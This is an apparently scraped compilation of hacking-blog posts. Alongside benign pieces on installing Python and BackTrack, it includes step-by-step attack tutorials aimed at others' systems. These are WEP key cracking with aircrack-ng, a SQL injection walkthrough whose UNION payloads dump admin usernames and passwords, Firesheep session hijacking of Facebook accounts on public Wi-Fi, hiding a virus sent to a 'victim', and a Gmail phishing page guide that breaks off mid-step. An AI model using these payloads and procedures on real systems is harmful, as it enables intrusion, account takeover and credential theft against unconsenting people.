USB flash drive portable browsers

Have you ever been some place other than your home on your computer? If your answer is anything other then yes, you need to stop being a computer hugging hippy and go outside, get a whif of some fresh air, step on some dog crap and accidently run over a cat. It’ll do you some good. Anyways, have you visited someone somewhere and while using his/her/its computer, you realized you didn’t know a password because it was saved on your browser, or you wanted to show your friend that one cool website with the non-Asian ninjas, but it was in your bookmarks, or you wanted to use an extension you had installed on your browser that got rid of homosexual ads? Well you can. It’s called portable browsers, a.k.a a browser on your USB drive.

If you use Mozilla Firefox, which I highly recommend, you can download the portable browser hiya: I’m a link.

If you’re an apple fanboy or just like safari, you can download it’s portable version hiya: I’m a link too.

If you use Internet Explorer, you must have some sort of brain blockage and need to fall off a cliff.

Some great features of these portable browsers are:

• you can take your bookmarks with you
• although probably not a good idea, for those of you that happen to always kill the braincells holding your passwords, you can take the saved one’s with you
• take all your extensions with you
• keeps your information stored on the flash drive instead of the computer you are using

Yummy!

School of Hack part-1

You never ask, “How do I become a hacker?” and you never say “I am a hacker.” Nowadays, you will run into countless YouTube Videos and blogs regarding “hacking.” I’m glad to hear Mr. Cracker’s first few episodes focused on what is a hacker and how does one hack. However, there are many stories that can be credited for tainting the term, like an incident in Los Alamos in 1982.


Webster’s dictionary defined a hacker as an expert at programming and solving problems with a computer. Hackers have otherwise been known as computer geeks or computer wizards; up until the word was tarnished by ruthless wizards that illegally gained access to systems and tamper with information. To this day, the word hacker is used to describe these geniuses that can force their way into an operating system and manipulate data. The term hacker derived from the reference to programmers “hacking away” at the bits and bytes. Since it takes an experienced hacker to gain unauthorized entrance into a secure computer to extract information and perform some prank or mischief at the site, the term has become synonymous with “cracker” or “blackhat”, a person who performs an illegal act. A technical professional that is paid to break into a computer system in order to test its security is called “Pentester” for Penetration Tester.


True hacking, is a culture of these programmers and pentesters that understand code and network security. To become one, is to be called one by an expert. If your friends proclaim you a “hacker” because you brute forced into an account in front of them, unless you wrote the algorithm, you are nothing but a “script kiddie”. If you wrote a program that is useful to the network security and you shared with the community and pentesters or system admins recognize your talent, then you are on your way.


But what is the way, you may ask. I will have to say, it’s a long way. It doesn’t happen overnight, and it doesn’t happen after reading this article of listening to every Mr. Cracker’s podcasts. Yet, there are certain steps you must follow, and I will elaborate in the articles to come. Let me get you started with the basics. A Hacker is a Programmer. Yes, not a MSCE or a CCNA but a programmer. Programming is a THE fundamental skill for hacking. I am a programmer. I began developing software over 10 years ago. I’m not the best, but I recommend you start by learning a language called Python. DO NOT start with a GUI based programming language like Java, or even Visual Basic or C#. Start with Python (http://www.python.org/) for two reasons. One, it’s free and powerful and two, it works on multiple platforms, i.e Windows or Linux. The importance of Linux is for another subject. Stick to semi-colon languages “;” like Perl and PHP, the object will be to move onto C and C++. It is best recommended in this subject that you learn or know all of the mentioned: Python, Perl, PHP, C and C++.


Utilize documentation provided on their site to learning Python. You would have to teach yourself in the next few days, months or years to be strong at that language. Then you can move onto another language, and it would become easier to learn once you understand data structuring and variables, etc. Hacking is the ability to use those languages and applying them to solve your problems. As you learn, keep in mind you are practicing how you think and you’re not really focusing on a particular language.

School of Hack

I’m glad to have seen a positive response on the first part of this series. Before I elaborate in programming in python or other hacking languages, I want to discuss with you the second important skill in hacking. In case you have not guessed it, if you want to become a hacker, you need know an Open Source UNIX operating system.

Can you hack in Windows?  Yes. Windows is a good operating system, and you can install Python and run programs in C on Windows. But Windows is not Open Source. Windows is distributed in binary, in other words, you can only install Windows and not change nor manipulate the code of the operating system (OS). An open source OS has the option to download the source code and contribute to it by programming features, utilities or tools for it. There are two lessons to be thought in this here skill today, and they go hand in hand. One, if you want to be a hacker, you have use and contribute to the Free and Open Source Software (FOSS). This is a cultural trait. You can contribute in such a community as SourceForge, where you can download and develop FOSS. Hackers share software with their community, they test FOSS they didn’t program, write documentation for it, debug it, and eventually, write their own open source software. That is one reason why hackers use a FOSS UNIX Operating System. There are different variants of UNIX or UX operating systems, free or proprietary such as AIX, BSD, Solaris, SCO, HP-UX and the most popular, Linux, which leads us to the second lesson.

UNIX has been the operating system for scientist by scientists. It goes without saying, that hacking is a science. In the days before the Mac OS and Windows, UNIX was king and in the 1970’s, UNIX creators at Bell Labs, provided the source code to the OS to be taught in universities or enhanced by researchers. A US born professor at Vrije University in Amsterdam wrote his own UNIX (MINIX, or Minimal UNIX) and provided the 12,000 lines of C and Assembly code when you bought his book “’Operating Systems: Design and Implementation” by Andrew S. Tanenbaum. MINIX was created to teach university students how an operating system works. One student, Linus Torvalds, took the source code provided by the book in floppy disks, programmed a kernel, and according to his newsgroup post on compo.os.minix took “feedback on things people like/dislike in minix” and programmed “features most people would want”. As he shared it with the online community, like a good hacker boy that he was, it gained a lot of attention and within one month of releasing Linux 0.01 (or Linus UX) on the Internet, many hackers contributed to 0.02. Eventually Linux grew into the hundreds of Linux distributions today.

There are other Free OSS UNIX operating systems around that are used for hacking, these include FreeBSD and OpenSolaris. However, the importance to becoming a good hacker is to understand UNIX and how it works on the Internet. To do so, one must know the UNIX and Internet Fundamentals. The question here is now, what do you want read about next: should I contribute in detail on programming Python, or would you rather me show you the different ways to run Linux, including Live Distro, virtual or full installation or running Linux off a network. My next part of this series will depend on the reader, this is subliminally training you to a hacker lessons learned, contribute to this by commenting, and you’re on your way to becoming a hacker.

Write for CyberCROW

Would you like to earn a few bucks by writing about what you know? Well, now you CAN! I will pay $1.00 whole dollars via PayPal for every article that you submit and possibly more depending on the content. That’s a free Subway one dolla’ foot long! But the article must be:

• original content
• related to security/hacking
• proper grammar ( I’m not going to be doing proofreading)
• the article must NOT be plagiarized! I’m not stupid so those of you that think you can fool me can go (insert profanity here).

In return for your article you will get:

• $1.00 and possible more depending on the content
• a link to your website on the post
• and depending on how much and how many times you contribute, you may get free access to some of my upcoming hacking products

Did you learn something new recently? If so, put it on paper, write up a guide/tutorial and send it in. Acting on the information you learn is the best way to learn and keep it in your head!

To submit your articles, email me at (cybercrow_team@yahoo.com).

This page will always be here, watching you, whispering in your ear in a creepy-like fashion “Write for me…”. You can’t escape it, accept it. Write for it. Write for us.

Installing Python on Linux

I’m back. Being that summer was in session, let’s say school was out, and I disappeared for a while doing some stuff for business purposes. So last time I wrote, School of Hacks – Part 2, I emphasized the use or learning and understanding a UNIX/Linux Operating System. Based on the feedback, it goes without saying that learning Python is a popular response to learn next.

I plan to get you started on the right foot and in doing so, I anticipate we will program a strong password generator. The very first lesson of course, is this lesson: Installing Python on Linux. In part 2 of this series, I described the the meaning behind Linux distributions, most Linux distributions come with Python installed. However, I will show you how to install Python on Debian and Fedora Linux. I chose these two distributions because they are the two major distros other systems are based on. Ubuntu, Knoppix, Linspire and others are Debian based while Fedora is RPM based just as Mandriva, SUSE and all Red Hat versions.

RPM Based Python installation

• Boot up your favorite RPM based Linux ditro, I’m using Fedora.
• Go to the Python for Linux RPM page at http://www.python.org/download/releases/2.4/rpms/
• Download the Binaries for Fefora Core 3, they are i386 RPM
• When the download is complete, open a console and go to the python-2.4.2.4….. file
• Make sure you have root access, otherwise type the following commands

localhost:~$ su

Password: [enter your root password]

• Type in the following command

• rpm -1 python2.4-2.4-1pydotorg.i386.rpm

• you should get a message, to read message

cat /var/spool/mail/root | less

• You should be able to start Python by typing Python on the console. This command can also be used prior to installation or to see the Python version currently installed.

Debian based systems could also already be pre-installed with Python. However, if need be, installing on a Debian based system might be a little easier.
Debian Based Python installation

• Boot up your favorite Debian based ditro, I’m running Debian 5

• Open a console and make sure you have root access, otherwise type the following commands

localhost:~$ su

Password: [enter your root password]

• Type in the following command

localhost:~# apt-get install python

• Do you want to continue? [Y/n] Y

• At this point, you should be able to start Python on the console on a Debian based system.

Although this covers a broad range of distributions, the categories of Linux distributions also include Gentoo, a portage package distro.

• Start up Gentoo
• Download the Python ebuild
• Reference the Gentoo Python Developers Guide

If you can go to a console, and  type:

python <enter>
1+1 <enter>

you should see and answer of 2, if so, you have properly installed Python on Linux and this should get you started in programming Python.

Hacking/Cracking WEP Using Backtrack: A Beginners Guide

A. SCOPE

This tutorial is intended for users with little or no experience with linux or wifi. The folks over at remote-exploit have released Backtrack

Get it Remote-Exploit.org - Supplying offensive security products to the world

a tool which makes it ridiculously easy to access any network secured by WEP encryption. This tutorial aims to guide you through the process of using it effectively.
Required Tools
You will need a computer with a wireless adapter listed here
Download Backtrack and burn its image to a CD
B. OVERVIEW

BACKTRACK is a bootable live cd with a myriad of wireless and tcp/ip networking tools. This tutorial will only cover the included kismet and aircrack-ng suite of tools.

Tools Overview
Kismet - a wireless network detector and packet sniffer
airmon - a tool that can help you set your wireless adapter into monitor mode (rfmon)
airodump - a tool for capturing packets from a wireless router (otherwise known as an AP)
aireplay - a tool for forging ARP requests
aircrack - a tool for decrypting WEP keys
iwconfig - a tool for configuring wireless adapters. You can use this to ensure that your wireless adapter is in monitor mode which is essential to sending fake ARP requests to the target router
macchanger - a tool that allows you to view and/or spoof (fake) your MAC address

Glossary of Terms
AP: Access Point: a wireless router
MAC Address: Media Access Control address, a unique id assigned to wireless adapters and routers. It comes in hexadecimal format (ie 00:11:ef:22:a3:6a)
BSSID: Access Point MAC address
ESSID: Access Points Broadcast name. (ie linksys, default, belkin etc) Some AP’s will not broadcast their name but Kismet may be able to detect it anyway
TERMINAL: MS-Dos like command line interface. You can open this by clicking the black box icon next to the start key in backtrack
WEP: short for Wired Equivalency Privacy, it is a security protocol for Wi-Fi networks
WPA: short for WiFi Protected Access. a more secure protocal than WEP for wireless networks. NOTE: this tutorial does not cover cracking WPA encryption

Since Backtrack is a live CD running off your cdrom, there is nowhere that you can write files to unless you have a linux partition on your hard drive or a usb storage device. Backtrack has some NTFS support so you will be able to browse to your windows based hard drive should you have one, but it will mount the partition as “read-only”. I dual boot windows and ubuntu on my laptop so I already have a linux swap partition and a reiserfs partition. Backtrack had no problem detecting these and mounting them for me. To find your hard drive or usb storage device, just browse to the /mnt folder in the file manager. Typically a hard drive will appear named something like hda1 or hda2 if you have more than one partition on the drive. Alternately hdb1 could show if you have more than one hard disk. Having somewhere to write files that you can access in case you need to reboot makes the whole process a little easier.
C. DISCLAIMER

Hacking into someone’s wireless network without permission is probably against the law. I wouldn’t recommend doing it. I didn’t break into anyone else’s network while learning how to do this .
D. IMPLEMENTATION

STEP 1
Monitoring Wireless Traffic With Kismet

Place the backtrack CD into your cd-rom drive and boot into Backtrack. You may need to change a setting in your bios to boot from cd rom. During boot up you should see a message like “Hit ctrl+esc to change bios settings”. Changing your first boot device to cdrom will do the trick. Once booted into linux, login as root with username: root password: toor. These are the default username and password used by backtrack. A command prompt will appear. Type startx to start KDE (a ‘windows’ like workspace for linux).

Once KDE is up and running start kismet by clicking on the start key and browsing to Backtrack->Wireless Tools -> Analyzers ->Kismet. Alternatively you can open a Terminal and type:

kismet

Kismet will start running and may prompt you for your wireless adapter. Choose the appropriate adapter, most likely ‘ath0?, and sit back as kismet starts detecting networks in range.

NOTE: We use kismet for two reasons.

1. To find the bssid, essid, and channel number of the AP you are accessing.

2. Kismet automatically puts your wireless adapter into monitor mode (rfmon). It does this by creating a VAP (virtual access point?) or in other words, instead of only having ath0 as my wireless card it creates a virtual wifi0 and puts ath0 into monitor mode automatically.



While kismet detects networks and various clients accessing those networks you might want to type ’s’ and then ‘Q’ (case sensitive). This sorts all of the AP’s in your area by their signal strength. The default ‘autofit’ mode that kismet starts up in doesn’t allow you much flexibility. By sorting AP’s by signal strength you can scroll through the list with the arrow keys and hit enter on any AP you want more information on. (side note: when selecting target AP keep in mind this tutorial only covers accessing host AP’s that use WEP encryption. In kismet the flags for encryption are Y/N/0. Y=WEP N=Open Network- no encryption 0= other: WPA most likely.)

Select the AP (access point) you want to access. Copy and paste the broadcast name(essid), mac address(bssid), and channel number of your target AP into a text editor. Backtrack is KDE based so you can use kwrite. Just open a terminal and type in ‘kwrite’ or select it from the start button. In Backtrack’s terminal to copy and paste you use shift+ctrl+c and shift+control+v respectively. Leave kismet running to leave your wireless adapter in monitor mode. You can also use airmon to do this manually.
airmon-ng -h
for more help with this

STEP 2
Collecting Data With Airodump

Open up a new terminal and start airodump so we can collect ARP replies from the target AP. Airodump is fairly straight forward for help with this program you can always type “airodump-ng -h” at the command prompt for additional options.

airodump-ng ath0 -w /root/belkin 9 1

Breaking down this command:
ath0 is my wireless card
-w tells airodump to write the file to
/root//belkin
9 is the channel 9 of my target AP
1 tells airodump to only collect IVS - the data packets with the WEP key
STEP 3
Associate your wireless card with the AP you are accessing.

aireplay-ng -1 0 -e belkin -a 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 ath0
-1 at the beginning specifies the type of attack. In this case we want fake authentication with AP. You can view all options by typing
aireplay-ng -h
0 specifies the delay between attacks
-e is the essid tag. belkin is the essid or broadcast name of my target AP. Linksys or default are other common names
-a is the bssid tag(MAC address). 00:11:22:33:44:55 is the MAC address of the target AP
-h is your wireless adapters MAC addy. You can use macchanger to view and change your mac address.
macchanger -s ath0
ath0 at the end is my wireless adapters device name in linux
STEP 4
Start packet injection with aireplay

aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 ath0
NOTES:
-b requires the MAC address of the AP we are accessing.
-h is your wireless adapters MAC addy. You can use macchanger to view and change your mac address.
macchanger -s ath0
if packets are being collected at a slow pace you can type
iwconfig ath0 rate auto
to adjust your wireless adapter’s transmission rate. You can find your AP’s transmission rate in kismet by using the arrow keys up or down to select the AP and hitting enter. A dialog box will pop up with additional information. Common rates are 11M or 54M.

As aireplay runs, ARP packets count will slowly increase. This may take a while if there aren’t many ARP requests from other computers on the network. As it runs however, the ARP count should start to increase more quickly. If ARP count stops increasing, just open up a new terminal and re-associate with the ap via step 3. There is no need to close the open aireplay terminal window before doing this. Just do it simultaneously. You will probably need somewhere between 200-500k IV data packets for aircrack to break the WEP key.

If you get a message like this:

Notice: got a deauth/disassoc packet. Is the source MAC associated ?

Just reassociate with the AP following the instructions on step 3.
STEP 5
Decrypting the WEP Key with Aircrack

Find the location of the captured IVS file you specified in step 2. Then type in a terminal:

aircrack-ng -s /mnt/hda2/home/belkin_slax_rcu-03.ivs

Change /mnt/hda2/home/belkin_slax_rcu-03.ivs to your file’s location

Once you have enough captured data packets decrypting the key will only take a couple of seconds. For my AP it took me 380k data packets. If aircrack doesn’t find a key almost immediately, just sit back and wait for more data packets.

If you get approx. 4,000 packets and ur desperate try wep_crack it works faster most the time

Backtrack 4 Forensics Capabilities

When you first boot up the new Backtrack 4, you may have noticed something slightly different. So what is this “Start BackTrack Forensics” option about?

Live CDs and Forensics

For a long time now, Linux Live CDs have been very useful for forensic acquisition purposes in instances where for one reason or another you can’t utilize a hardware write blocker. When configured not to automount drives, and a little bit of know how, a Linux Live CD can be a wonderful software write blocker. For a Linux live CD to be considered for this purpose however, it is of the utmost importance that the use of the live CD in no way alters any data in any manner. In the past, this ruled out the use of Backtrack for forensic purposes. Backtrack would automount available drives and utilize swap partitions where available. This could cause all sorts of havoc, changing last mount times, altering data on disk, and so on. Well, no longer! The Backtrack 4 Live CD has incorporated changes to allow a boot mode which is forensically clean. This is great news, as with Backtrack being such a popular live CD, a copy can often be found close at hand.

How?

So, lets have the scoop. Forensic people are often detail oriented and very conservative, so how do we know it is safe to use? Well, first off the Backtrack 4 Live CD is based off of Casper, and contains no filesystem automount scripts at all. The system initialization scripts have been altered in the forensic boot mode so that Backtrack 4 will not look for or make use of any swap partitions which are contained on the system. All those scripts have been removed from the system.

Verification

To test this functionality, we have tested this boot mode with multiple hardware configurations. For each test, we took a before MD5 snapshot of the system disks, booted BT4 in forensic boot mode, verified no file systems were mounted and swap was not in use, did a number of activities on the system, then shut the system back down and took an after MD5 snapshot. In comparing the two MD5 snapshots, in every case they were a match, demonstrating no changes on the disks has been made. So, can you trust Backtrack 4 for your forensic purposes? Well, not until you verify it as well! Just like any forensic tool, its negligent to just take someone else’s word that any tool works properly. Its up to you to independently verify the tool before you use it. We expect your results will match ours, and you will find Backtrack 4 is a great addition to you tool set. (And, if your results find a problem, please let us know ASAP and include details as to how you conducted your testing. As, that would be a real problem.)

Usage

When you utilize Backtrack for forensics purposes, be sure you don’t let it go through an unattended boot. Default boot for Backtrack is standard boot mode, which will use swap partitions if they are present. There is a nice long delay however, so you will have plenty of time to select the proper boot mode. Also, please remember, this is a Linux distribution. It is highly suggested that you become familiar with Linux before use this, or any other Linux Live CD for any forensic purpose. Also, be sure to check out the additional forensic tools added to Backtrack 4. We have concentrated on the addition of imaging and triage tools, but if you find that one of your favorite utilities is not in place please let us know so we can look into having it added.

Customizing the BackTrack Image

Customizing the BackTrack iso is simple, using a pre-made script. Ideally, you should be editing the ISO file *on a BackTrack install* to ensure correct versions of squashfs, etc. Otherwise your mileage will vary. Please note that the script is very basic, and will need some modification (such as the hardcoded iso filename, etc). Make sure to look through it before running it. For more information, check the following blog post : http://www.offensive-security.com/blog/backtrack/customising-backtrack-live-cd-the-easy-way/

Install BackTrack in VMWare

Follow the basic install instructions here to get BackTrack installed in a VMware machine.

1. Log into BackTrack. To install the VMWare drivers, the kernel source and headers need to be in place. By default in the BackTrack 4 final release, the kernel (denoted by {version} ) is configured and ready. However in some cases, you might need to make sure you have the latest kernel sources by typing in:
apt-get update apt-get install linux-source cd /usr/src tar jxpf linux-source-{version}.tar.bz2 ln -s linux-source-{version} linux cd linux zcat /proc/config.gz > .config make scripts make prepare
2. Now that your kernel sources and headers are in place, run the “Install VMWare tools” for the specific guest VM.
3. Mount the VMWare tools virtual cd, copy over the VMWare tools package and run the installer:
mount /dev/cdrom3 /mnt/cdrom cp /mnt/cdrom/VMwareTools-{version}.tar.gz /tmp/ cd /tmp/ tar zxpf VMwareTools-{version}.tar.gz cd vmware-tools-distrib ./vmware-install.pl
4. Complete the VMWare tools installation as required. Run “fix-splash” to reintroduce the green framebuffer console. Reboot.

BackTrack Live USB Install

This method of getting a live install to a USB drive is the simplest available using Unetbootin. Note that we will format the USB drive and erase its contents.

1. Plug in your USB Drive (Minimum USB Drive capacity 2 GB)
2. Format the USB drive to FAT32
3. Download Unetbootin from http://unetbootin.sourceforge.net/
4. Start Unetbootin and select diskimage (use the backtrack-final ISO)
5. Select your USB drive and click “OK” for creating a bootable BackTrack USB drive
6. Log into BackTrack with the default username and password root / toor.

BackTrack Dual Boot Install with Windows (Tested on Win 7)

This method of installation is the simplest available. The assumption is that the you have a Windows installation taking up all the space on your drive, and you would like to resize and repartition your drive to allow a BackTrack install alongside your Windows. BACK UP YOUR WINDOWS INSTALLATION FIRST.

1. Boot BackTrack on the machine to be installed. Once booted, type in “startx” to get to the KDE graphical interface.
2. Double click the “install.sh” script on the desktop, or run the command “ubiquity” in console.
3. Select your geographical location and click “forward”. Same for the Keyboard layout.
4. The next screen allows you to configure the partitioning layout. The assumption is that we are resizing the Windows 7 partition and installing BackTrack on the newly made space.
5. Accept the installation summary and client “Install”. Allow the installation to run and complete. Restart when done.
6. Grub should allow you to boot both into BackTrack and Windows.
7. Log into BackTrack with the default username and password root / toor. Change root password.
8. Fix the framebuffer splash by typing “fix-splash” ( or “fix-splash800″ if you wish a 800×600 framebuffer), reboot.

Install BackTrack to Hard Disc

BackTrack Clean Hard Drive Install

This method of installation is the simplest available. The assumption is that the whole hard drive is going to be used for BackTrack.

1. Boot BackTrack on the machine to be installed. Once booted, type in “startx” to get to the KDE graphical interface.
2. Double click the “install.sh” script on the desktop, or run the command “ubiquity” in console.
3. Select your geographical location and click “forward”.  Same for the Keyboard layout.
4. The next screen allows you to configure the partitioning layout. The assumption is that we are deleting the whole drive and installing BackTrack on it.
5. Accept the installation summary and client “Install”. Allow the installation to run and complete. Restart when done.
6. Log into BackTrack with the default username and password root / toor. Change root password.
7. Fix the framebuffer splash by typing “fix-splash” ( or “fix-splash800″ if you wish a 800×600 framebuffer), reboot.

Break the Database of Website using SQL Injection

 In this tutorial i am going to guide how to hack the website database using SQL injection.  First of all you need to understand what is sql injection, so kindly read this tutorial

How to Break the Database:

Step 1 :
First we need to check whether website is vulnerable or not( i meant hackable or not) . In order to that, you need to find a page that looks like this:

www.site.com/page=1
or
www.site.com/id=5 

 
Enter this url into google search or address bar.  Basically the site needs to have an = then a number or a string, but most commonly a number.

Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/page=1'

If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection. 

Step 2 :

Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2-- 
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5-- 

 If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

If the above method is not  working then try this:

www.site.com/page=1 order by 1
http://www.site.com/page=1 order by 2 
http://www.site.com/page=1 order by 3
http://www.site.com/page=1 order by 4
http://www.site.com/page=1 order by 5

Step 3 :

We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--
This is what we would enter if we have 4 columns. If you have 7 columns you would put, union all select 1,2,3,4,5,6,7-- . If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.

Step 4 :

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()

or if these dont work try...

@@user
@@version
@@database

For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.

  If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5 :
In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6 :
In this Step we want to list all the column names in the database, to do this we use the following command:
union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--

This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7 :
Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,

union all select 1,2,group_concat(username,0x3a,password),4 from admin--

So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website.

What is Database and MY SQL Injections

In this i'll give you intro to the SQL Injections. Next post will give you detailed information about the SQL injections.

What is the Database?
  Datbase is an application that stores a collection of Data.Database offers various APIs for creating, accessing and managing the data it holds. And database(DB) servers can be integrated with our web development so that we can pick up the things we want from the database without much difficulties.


Database is a place that stores username,passwords and more details.  Database should be secured.  But providing high level security is not possible for all sites(much costlier or poor programming ). So Database of many websites is insecure or vulnerable(easily hackable).

Some List of Database are:

• DB servers,
• MySQL(Open source), 
• MSSQL, 
• MS-ACCESS, 
• Oracle, 
• Postgre SQL(open source), 
• SQLite,

 What is SQL injection?
      SQL injection is Common and famous method of hacking  at present .  Using this method an unauthorized person can access the database of the website.  Attacker can get all details from the Database.

What an attacker can do?

• ByPassing Logins
• Accessing secret data
• Modifying contents of website
• Shutting down the My SQL server

METHODS USED FOR WEBSITE HACKING

COMMON METHODS USED FOR WEBSITE HACKING

• Remote File Inclusion or RFI
• SQL injection
• Cross site scripting or XXS
• Local file inclusion or LFI
• Directory Traversal attack

RFI:
  RFI stands for Remote File Inclusion and it allows the attacker to upload a custom coded/malicious file on a website or server using a script.  The vulnerability occurs due to the use of user supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:

• Code execution on the web server
• Code execution on the client-side such as Javascript which can lead to other attacks such as cross site scripting (XSS).
• Denial of Service (DoS)
• Data Theft/Manipulation

Local File Inclusion:
 Local File Inclusion known as LFI. It
It is same as RFI.


SQL injection:
   A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

By doing this you can get the admin id and password.  after getting the Username and password you can access the control panel of admin and change the website details or whatever you like,you can do.
For more Details  read this articles
What is SQL iNJECTION?
Implementation of SQL Injection

Cross site scripting or XXS :

It is is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites were roughly 80% of all security vulnerabilities documented by Symantec as of 2007. Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigations implemented by the site's owner



Directory Traversal attack
A directory traversal (or path traversal) is to exploit insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.

The goal of this attack is to order an application to access a computer file that is not intended to be accessible. This attack exploits a lack of security (the software is acting exactly as it is supposed to) as opposed to exploiting a bug in the code.

Directory traversal is also known as the ../ (dot dot slash) attack, directory climbing, and backtracking. Some forms of this attack are also canonicalization attacks.

Backtrack 4 Linux Introduction to BTS readers-Hack professionally

Back Track 4-The OS known for Hacking/Penetration Testing.

Back Track 4 - Ethical Hacking Tutorials(BTS)

BackTrack is Linux Based Penetration Testing Operating system which help the security professionals to test the security of the system. The Special thing the about this OS is that no need to install. You can run the Backtrack directly from CD,Flash/Pen Drive.(you can install the backtrack as main operating system also).

 BackTrack4 is developed from the earlier linux distribution namely Whoppix, IWHAX, and Auditor.
BackTrack is funded by offensive Security.

New Features in BackTrack 4 r2 
* Kernel 2.6.35.8 – *Much* improved mac80211 stack.
* USB 3.0 support.
* New wireless cards supported.
* All wireless Injection patches applied, maximum support for wireless attacks.
* Even *faster* desktop environment.
* Revamped Fluxbox environment for the KDE challenged.
* Metasploit rebuilt from scratch, MySQL db_drivers working out of the box.
* Updated old packages, added new ones, and removed obsolete ones.
* New BackTrack Wiki with better documentation and support.
* Our most professional, tested and streamlined release ever.

Download:
http://www.backtrack-linux.org/downloads


If you have any queries ,this link will clarify you :

http://www.backtrack-linux.org/wiki/index.php/FAQ

You can install the backtrack in all possible ways.  i mean you can install along with windows,inside windows, inside linux, in external hard drive,pen drive, in hard drive, in virtual box(there are more options)

Lines From Backtrack4-Linux.org:

Whether you’re hacking wireless, exploiting servers, performing a web application assessment, learning, or social-engineering a client, BackTrack is the one-stop-shop for all of your security needs.

More details and tutorials coming soon..!!!

How to hide the windows while running the virus code?

Good Morning Friends...!!  This day will be great day!  Because Break The Security get top rank in blogger directories. 

Now i am going to introduce a new tool called as "CMDOW" .   When you create and send virus to victim, the virus running process may be shown to victims.  This tool will hide that also.



About Cmdow

Cmdow is a Win32 commandline utility for NT4/2000/XP/2003 that allows windows to be listed, moved, resized, renamed, hidden/unhidden, disabled/enabled, minimized, maximized, restored, activated/inactivated, closed, killed and more.

Cmdow is 31kb standalone executable. It does not create any temporary files, nor does it write to the registry. There is no installation procedure, just run it. To completely remove all traces of it from your system, delete it.

Cmdow was written with batch file programmers in mind. Particular attention has been paid to Cmdows output making it easy to process with the 'FOR /F' command found in NT4/2000/XP/2003.


For more details and Download from here:

http://www.commandline.co.uk/cmdow/

How to Hack Facebook account using Wi-Fi?

Recently You mozilla add on namely " FireSheep" is used for hack thousands of email accounts . As reported by techcurnch, Firesheep has been downloaded more than 104,000 times in roughly  within 24 hours.

What is the Special in FireSheep?
 Using FireSheep add on you can control any account without knowing the username and password .   Famous Social Network Facebook is victim of this Firesheep.



How?
The Firesheep uses HTTP Session Hijacking to  gain the username and password.

What is HTTP Session Hijacking?
Attacker use HTTP session Hijacking to steal the cookies from victim.  Cookies are file which contains the password and username .

Using this HTTP Session Hijacking method you can hack Facebook Google, Yahoo, Orkut, Flickr etc or any other email account.

How to use this Firesheep to steal the cookies?
 You will need this requirements:

• Public wifi access 
• winpcap
• Firesheep(Download)

Step 1:
Download the Firesheep file.
Right click on the file and select "Open With"
and select Mozila Firefox.

Step 2:

Once you have installed firesheep on firefox web browser, Click on view at the top, then goto sidebar and click on Firesheep

Step 3:

Now click on the top left button "Start capturing" and it will start to capture the session cookies of people in your wifi network, This will show you the list of those people whose cookies are captured and have visited unsecured website known to firesheep, Double click on the photo and you will be logged in instantly

How to create fake or Phishing web page for gmail

 This post will explain you how to create fake or phishing web page for gmail. This Procedure can be used to make fake page for other websites like yahoo,msn,or any other sites which you want to steal the password of particular user.

Steps for Creating Phishing or Fake web Page:

Step 1:
Go to the gmail.com.  Save the Page as "complet HTML" file

Step 2:
Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif","mail_logo.png"

Step3:
 Upload those image to tinypic or photobucker.com.  copy the url of each image.

Step4:
Open the HTML file in Wordpad.
Search for "google_transparent.gif" (without quotes) and replace it with corresponding url .
Search for "mail_logo.png" (without quotes) and replace it with corresponding url .

Step 5:
Search for the

